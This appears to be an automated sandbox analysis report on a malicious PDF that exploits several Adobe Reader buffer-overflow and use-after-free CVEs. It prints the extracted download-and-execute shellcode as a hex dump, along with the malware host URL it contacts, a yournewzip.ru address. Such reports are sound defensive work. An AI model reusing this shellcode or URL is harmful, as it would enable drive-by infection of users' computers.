Analysis report for jkjom_com-ChangeLog_pdf.bin

Sample Overview

Filejkjom_com-ChangeLog_pdf.bin
MD5ab056c0e261160aeabe56836e21b4408
Analysis Started2010-02-17 17:46:47
Report Generated2010-02-18 00:36:03
Jsand version1.02.02

Detection results

DetectorResult
Jsand 1.02.02malicious

Exploits

NameDescriptionReference
Adobe Collab overflowMultiple Adobe Reader and Acrobat buffer overflowsCVE-2007-5659
Adobe util.printf overflowStack-based buffer overflow in Adobe Acrobat and Reader via crafted format string argument in util.printfCVE-2008-2992
Adobe getIconStack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab objectCVE-2009-0927
doc.media.newPlayerUse-after-free vulnerability in the Doc.media.newPlayer method in Adobe Reader and Acrobat 8.0 through 9.2CVE-2009-4324

Deobfuscation results

Evals

No evals.

Writes

No writes.

Network Activity

Requests

URL
file://jkjom_com-ChangeLog_pdf.bin

ActiveX controls

Shellcode and Malware

HexadecimalASCII
0a 0a 0a 0a 0a 0a 0a 0a  33 c0 64 8b 40 30 78 0c 
8b 40 0c 8b 70 1c ad 8b  58 08 eb 09 8b 40 34 8d 
40 7c 8b 58 3c 6a 44 5a  d1 e2 2b e2 8b ec eb 4f 
5a 52 83 ea 56 89 55 04  56 57 8b 73 3c 8b 74 33 
78 03 f3 56 8b 76 20 03  f3 33 c9 49 50 41 ad 33 
ff 36 0f be 14 03 38 f2  74 08 c1 cf 0d 03 fa 40 
eb ef 58 3b f8 75 e5 5e  8b 46 24 03 c3 66 8b 0c 
48 8b 56 1c 03 d3 8b 04  8a 03 c3 5f 5e 50 c3 8d 
7d 08 57 52 b8 33 ca 8a  5b e8 a2 ff ff ff 32 c0 
8b f7 f2 ae 4f b8 65 2e  65 78 ab 66 98 66 ab b0 
6c 8a e0 98 50 68 6f 6e  2e 64 68 75 72 6c 6d 54 
b8 8e 4e 0e ec ff 55 04  93 50 33 c0 50 50 56 8b 
55 04 83 c2 7f 83 c2 31  52 50 b8 36 1a 2f 70 ff 
55 04 5b 33 ff 57 56 b8  98 fe 8a 0e ff 55 04 57 
b8 ef ce e0 60 ff 55 04  68 74 74 70 3a 2f 2f 79 
6f 75 72 6e 65 77 7a 69  70 2e 72 75 3a 38 30 38 
30 2f 6d 61 69 6e 2e 70  68 70 3f 69 64 3d 36 26 
68 65 6c 6c 6f 33 31 34  
........3.d.@0x.
.@..p...X....@4.
@|.X<jDZ..+....O
ZR..V.U.VW.s<.t3
x..V.v ..3.IPA.3
.6....8.t......@
..X;.u.^.F$..f..
H.V........_^P..
}.WR.3..[.....2.
....O.e.ex.f.f..
l...Phon.dhurlmT
..N...U..P3.PPV.
U......1RP.6./p.
U.[3.WV......U.W
....`.U.http://y
ournewzip.ru:808
0/main.php?id=6&
hello314

Additional (potential) malware:

URLTypeHashAnalysis
http://yournewzip.ru:8080/main.php?id=6&hello314 N/A N/A